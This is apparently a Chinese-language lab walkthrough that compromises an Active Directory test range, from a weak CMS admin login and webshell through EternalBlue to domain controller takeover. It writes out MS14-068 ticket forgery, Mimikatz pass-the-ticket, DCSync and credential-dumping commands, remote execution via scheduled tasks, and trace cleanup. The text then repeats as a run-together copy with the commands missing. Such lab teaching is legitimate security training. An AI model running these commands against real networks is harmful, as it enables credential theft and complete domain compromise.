域靶场渗透实战教学文档

环境准备

硬件要求

内存：8GB以上
虚拟机：需要同时运行五台虚拟机

网络配置

将物理机的VMnet8网络地址改为192.168.100.1
将物理机的VMnet19网络地址改为192.168.200.1

目标系统

最终目标：获取ser-dc1的域控权限
公网IP：192.168.100.50

工具准备

菜刀（Webshell连接工具）
QuarksPwDump.exe（密码提取工具）
Kali Linux（渗透测试系统）
MS14068（Kerberos提权漏洞利用工具）
Mimikatz（凭证提取工具）
MSF（Metasploit Framework）

渗透流程

1. 信息搜集阶段

网站识别：发现网站使用MetInfo 5.0.4 CMS系统
后台登录：
- 默认后台路径：/admin
- 尝试弱密码：admin/admin123成功登录
漏洞利用：
- 搜索MetInfo 5.0.4漏洞利用方法
- 使用PHPStudy搭建环境上传一句话木马

2. 获取Webshell

使用菜刀连接上传的Webshell
检查权限：whoami显示为system权限
提取管理员密码：
- 使用QuarksPwDump.exe获取密码哈希
- 在cmd5.com解密哈希
建立持久访问：
- 使用代理工具建立反向连接
- 开启3389端口进行远程桌面连接

3. 攻击Office区域

网络扫描：
- 上传IP扫描工具发现192.168.1.102
- 使用nmap扫描开放端口
漏洞利用：
- 使用MSF的exploit/windows/smb/ms17_010_eternalblue模块攻击
- 成功获取meterpreter会话

4. 域内信息搜集

确认域环境：
- whoami查看当前用户
- ipconfig /all查看域名和域控IP
域信息收集：
- ping域控IP获取主机名
- nltest /dsgetdc:hacker /server:10.1.1.3核实域信息
用户和组信息：
- net user /domain查看所有域用户
- net group "domain admins" /domain获取域管理员列表
- net group "domain controllers" /domain查看域控制器
- net group "domain computers" /domain查看域机器
- net group /domain查询域内组
网络共享：
- net view查看域内机器列表
- net view \\10.1.1.3查看特定机器共享资源
其他信息：
- whoami /all获取SID
- tasklist /v查看进程用户
- klist查看票据

5. 获取域控权限

使用MS14068漏洞：

14068py.exe -u test@hacker.com -p "123.com" -s S-1-5-21-1854149318-4101476522-1845767379-1107 -d WIN-0N3ST0ESE8L.hacker.com

生成票据凭证文件

使用Mimikatz加载票据：

mimikatz.exe "kerberos::ptc TGT_test@hacker.com.ccache" exit

验证访问：
- klist查看票据数量
- dir \\WIN-0N3ST0ESE8L.hacker.com\c$访问域控共享目录

6. 导出域Hash

方法一：使用Mimikatz

执行DCSync攻击：

lsadump::dcsync /domain:hacker.com /user:administrator /csv

替换用户名可获取其他用户hash

方法二：使用计划任务+Mimikatz

上传工具到域控：

copy mimikatz.exe \\WIN-0N3ST0ESE8L.hacker.com\c$

创建批处理文件1.bat：

mimikatz.exe privilege::debug sekurlsa::logonpasswords exit>1.txt

创建计划任务：

at \\WIN-0N3ST0ESE8L.hacker.com 19:37 \\WIN-0N3ST0ESE8L.hacker.com\c$\1.bat

查看结果：

type \\WIN-0N3ST0ESE8L.hacker.com\c$\1.txt

7. 清理痕迹

删除上传的所有工具和生成的文件
清除创建的票据和计划任务

关键知识点总结

CMS漏洞利用：老旧CMS系统往往存在已知漏洞，可通过公开漏洞库查找利用方法
权限提升：从Webshell的system权限到域管理员权限的完整路径
横向移动：利用内网扫描和漏洞利用在内网中横向移动
域渗透技术：
- 使用MS14068进行Kerberos提权
- 使用Mimikatz进行凭证提取和票据传递攻击
- 使用DCSync获取域哈希
持久化技术：通过计划任务执行远程命令
痕迹清理：渗透完成后必须清理所有上传的工具和生成的文件

注意事项

本技术仅用于合法授权的安全测试
实际渗透测试前必须获得书面授权
操作过程中注意记录所有步骤，便于报告编写
敏感操作（如DCSync）可能会触发安全警报
时间同步对Kerberos攻击至关重要

域靶场渗透实战教学文档环境准备硬件要求内存：8GB以上虚拟机：需要同时运行五台虚拟机网络配置将物理机的VMnet8网络地址改为192.168.100.1 将物理机的VMnet19网络地址改为192.168.200.1 目标系统最终目标：获取ser-dc1的域控权限公网IP：192.168.100.50 工具准备菜刀（Webshell连接工具） QuarksPwDump.exe（密码提取工具） Kali Linux（渗透测试系统） MS14068（Kerberos提权漏洞利用工具） Mimikatz（凭证提取工具） MSF（Metasploit Framework）渗透流程 1. 信息搜集阶段网站识别：发现网站使用MetInfo 5.0.4 CMS系统后台登录：默认后台路径：/admin 尝试弱密码：admin/admin123成功登录漏洞利用：搜索MetInfo 5.0.4漏洞利用方法使用PHPStudy搭建环境上传一句话木马 2. 获取Webshell 使用菜刀连接上传的Webshell 检查权限： whoami 显示为system权限提取管理员密码：使用QuarksPwDump.exe获取密码哈希在cmd5.com解密哈希建立持久访问：使用代理工具建立反向连接开启3389端口进行远程桌面连接 3. 攻击Office区域网络扫描：上传IP扫描工具发现192.168.1.102 使用nmap扫描开放端口漏洞利用：使用MSF的 exploit/windows/smb/ms17_010_eternalblue 模块攻击成功获取meterpreter会话 4. 域内信息搜集确认域环境： whoami 查看当前用户 ipconfig /all 查看域名和域控IP 域信息收集： ping 域控IP获取主机名 nltest /dsgetdc:hacker /server:10.1.1.3 核实域信息用户和组信息： net user /domain 查看所有域用户 net group "domain admins" /domain 获取域管理员列表 net group "domain controllers" /domain 查看域控制器 net group "domain computers" /domain 查看域机器 net group /domain 查询域内组网络共享： net view 查看域内机器列表 net view \\10.1.1.3 查看特定机器共享资源其他信息： whoami /all 获取SID tasklist /v 查看进程用户 klist 查看票据 5. 获取域控权限使用MS14068漏洞：生成票据凭证文件使用Mimikatz加载票据：验证访问： klist 查看票据数量 dir \\WIN-0N3ST0ESE8L.hacker.com\c$ 访问域控共享目录 6. 导出域Hash 方法一：使用Mimikatz 执行DCSync攻击：替换用户名可获取其他用户hash 方法二：使用计划任务+Mimikatz 上传工具到域控：创建批处理文件1.bat：创建计划任务：查看结果： 7. 清理痕迹删除上传的所有工具和生成的文件清除创建的票据和计划任务关键知识点总结 CMS漏洞利用：老旧CMS系统往往存在已知漏洞，可通过公开漏洞库查找利用方法权限提升：从Webshell的system权限到域管理员权限的完整路径横向移动：利用内网扫描和漏洞利用在内网中横向移动域渗透技术：使用MS14068进行Kerberos提权使用Mimikatz进行凭证提取和票据传递攻击使用DCSync获取域哈希持久化技术：通过计划任务执行远程命令痕迹清理：渗透完成后必须清理所有上传的工具和生成的文件注意事项本技术仅用于合法授权的安全测试实际渗透测试前必须获得书面授权操作过程中注意记录所有步骤，便于报告编写敏感操作（如DCSync）可能会触发安全警报时间同步对Kerberos攻击至关重要